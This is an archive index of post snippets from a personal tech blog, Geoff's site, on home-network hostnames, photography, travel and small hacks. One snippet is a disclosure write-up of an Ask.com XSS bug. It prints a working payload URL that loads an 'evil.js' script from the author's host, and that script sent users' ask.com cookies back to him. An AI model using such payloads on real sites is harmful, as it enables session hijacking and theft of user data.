
Total: 127

  • Geoff's site: Hostnames
    192 168 1 1 lithium is 192 168 1 3 carbon is 192 168 1 6 and so on Every element also has a standardized abbreviation allowing for short CNAMEs h local domain li local domain c local domain etc Elements have classifications that can be applied to hosts On my network hydrogen is my router rack mount servers are alkali metals embedded devices are noble gasses gaming consoles are

    Original URL path: http://geoff.greer.fm/2009/06/17/hostnames/ (2016-02-15)


  • Geoff's site: GeoIP Impostor
    Hulu Netflix or Joost At best content available in other countries is a small subset of that in the US A while ago I got the idea of creating a service to allow people to get around these restrictions Here s how it works VPN servers are set up in different countries using virtualization providers like EC2 This allows a new VM with a different IP to be quickly spawned if a host is blocked Clients sign up for the service and download an OpenVPN config or an OpenVPN client bundled with the config They connect to a VPN server in the country they want to pretend they re from All traffic goes over the VPN so the client is effectively an impostor Of course VPNs have many uses besides GeoIP evasion You can safely use public WiFi circumvent censorship in your home country or test for localized outages Many VPN providers exist but I haven t found any that advertise the ability to circumvent GeoIP Most importantly VPN providers usually offer either a single exit point or no way to choose the exit point Anyway I ve set up OpenVPN servers in the US and EU on EC2 An

    Original URL path: http://geoff.greer.fm/2009/05/18/geoip-impostor/ (2016-02-15)

  • Geoff's site: Refresh Cannon Bot
    The angle goes from 0 90º over 10 seconds so half a second is the difference between 75º and 79 5º Since the novelty of refreshing your browser gets old extremely quickly I wrote a Ruby script to give myself the high score The script just tries a bunch of angles and powers that are likely to result in a hit I have no clue how to do image processing in Ruby so I just checked the HTTP response size The Win image is usually about 1k larger than the Miss image Unfortunately it looks like somebody else wrote their own script and started running it several hours before I discovered the blog post I ll have to settle with second place Update I am now in 1st place I didn t put much effort into the angle power guessing since latency screws up any attempt to methodically carpet bomb the map I account for constant latency but jitter is bad enough that trying the same times between HTTP requests will cause the cannonball to land only in the general area intended Here s my script in case you re curious Yes yes I know it s hideous If I

    Original URL path: http://geoff.greer.fm/2009/05/05/refresh-cannon-bot/ (2016-02-15)

  • Geoff's site: Ask.com Answer Bar XSS
    Any URI scheme was allowed including javascript and data JavaScript in the URI was run in ask com s security context This link worked until very recently Once I knew I could run arbitrary JavaScript I wrote a proof of concept For a demonstration I asked some coworkers to make sure they were logged in to Ask com then click here TinyURL redirects to http www ask com bar q ask page 1 qsrc 0 zoom ab 0 u javascript document write 22 3Cscript 20src 22http geoff greer fm evil evil js cachebuster Math random 22 3E 3C script 3E 22 which downloaded and ran evil js Evil js sent ask com cookies to my site then added an item to the user s MyStuff saved results The MyStuff item linked to everyone s cookie info It s a good thing Ask doesn t have any useful features otherwise this vulnerability would be newsworthy Instead it s just XSS practice for me and another security mistake by Ask Ask deployed the answer bar on February 5th E mails were sent tickets were filed and it was fixed today March 4th Of course that one bug is the tip of the

    Original URL path: http://geoff.greer.fm/2009/03/04/answer-bar-xss/ (2016-02-15)

  • Geoff's site: Photography
    significant motion blur poor focus etc I had nine It was cloudy so lighting was low and the color balance was all out of whack Most pictures were underexposed because I kept the shutter speed fast to reduce motion blur Alright so I had eight decent photos I kept an out of focus photo because WordPress galleries do weird things if they re not three columns wide Anyway I fixed

    Original URL path: http://geoff.greer.fm/2009/03/04/photography/ (2016-02-15)

  • Geoff's site: Snow
    Consulting Snow 29 Dec 2008 Notice the height of the chain link fence in the background The sun came out for a minute Done shoveling the driveway There s a car under all that snow Toys Toys Toys Photography When

    Original URL path: http://geoff.greer.fm/2008/12/29/snow/ (2016-02-15)

  • Geoff's site: Toys Toys Toys
    Honda CB350 Here are some pictures from a Christmas Day ride on Old San Jose Road I spent the week before Christmas at my aunt s place on Oahu Now I m visiting family in Spokane The amount of snow

    Original URL path: http://geoff.greer.fm/2008/12/28/toys-toys-toys/ (2016-02-15)

  • Geoff's site: China Trip
    similar in texture and size but very different in taste Since this restaurant did not have picture menus we pointed to the cheapest beer on the menu and as you can see got Budweiser Speaking of beer this bottle of Xihu Light Beer has english text in capital red letters FREE FROM FORMALDEHYDE It s kind of scary to see that warning after you ve spent a week drinking other

    Original URL path: http://geoff.greer.fm/2008/12/11/china-trip/ (2016-02-15)